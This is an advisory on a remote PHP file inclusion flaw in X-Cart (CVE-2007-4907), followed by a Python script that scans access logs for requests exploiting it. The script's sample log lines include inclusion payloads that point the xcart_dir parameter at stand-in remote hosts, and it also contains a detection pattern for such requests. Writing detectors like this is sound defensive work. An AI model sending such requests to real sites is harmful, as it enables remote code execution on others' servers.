Qualiteam · X-Cart · CVE-2007-4907
Name of the Vulnerable Software and Affected Versions:
X-Cart (affected versions not specified)
Description:
The issue allows remote attackers to execute arbitrary PHP code via a URL in the `xcart_dir` parameter to various PHP files, including `config.php`, `prepare.php`, `smarty.php`, `customer/product.php`, `provider/auth.php`, and `admin/auth.php`.
Recommendations:
At the moment, there is no information about a newer version that contains a fix for this vulnerability.
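
With no fixed version listed, one interim check is to search web server access logs for the request pattern in the description. The following is an added example, not part of the original advisory or of X-Cart; it assumes combined-format access logs and that the parameter appears in requests as `xcart_dir`, and its sample log lines are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Scripts named in the advisory (its list is introduced with "including").
NAMED = ("config.php", "prepare.php", "smarty.php",
         "customer/product.php", "provider/auth.php", "admin/auth.php")
PARAM = "xcart_dir"  # assumed spelling of the parameter on the wire
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value that starts with a URL scheme (http:, ftp:, ...) or with "//".
REMOTE = re.compile(r"\s*(?:[a-z][a-z0-9+.\-]+:|//)", re.I)

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so double-encoded values still match."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_requests(lines):
    """Return (line_no, path, named_in_advisory, value) for each hit."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        path = url.path.lower()
        if not path.endswith(".php"):
            continue
        named = any(path.endswith("/" + script) for script in NAMED)
        for key, raw in parse_qsl(url.query, keep_blank_values=True):
            value = fully_decode(raw)
            if key == PARAM and REMOTE.match(value):
                hits.append((line_no, url.path, named, value))
    return hits

# Constructed sample log lines (documentation address ranges and hostnames).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /xcart/customer/product.php?productid=17 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /xcart/config.php?xcart_dir=http://example.invalid/a.txt HTTP/1.1" 200 312',
    '198.51.100.7 - - [01/Jan/2024:10:00:06 +0000] "GET /xcart/admin/auth.php?xcart_dir=ftp%253A%252F%252Fexample.invalid%252Fb HTTP/1.1" 200 0',
    '192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /xcart/home.php?xcart_dir=/var/www/xcart HTTP/1.1" 200 100',
    '198.51.100.9 - - [01/Jan/2024:10:00:12 +0000] "POST /xcart/cart.php?xcart_dir=HTTP://example.invalid/c HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

A hit on a script outside the advisory's list is still reported, with the third field set to `False`, because the advisory's list is not exhaustive.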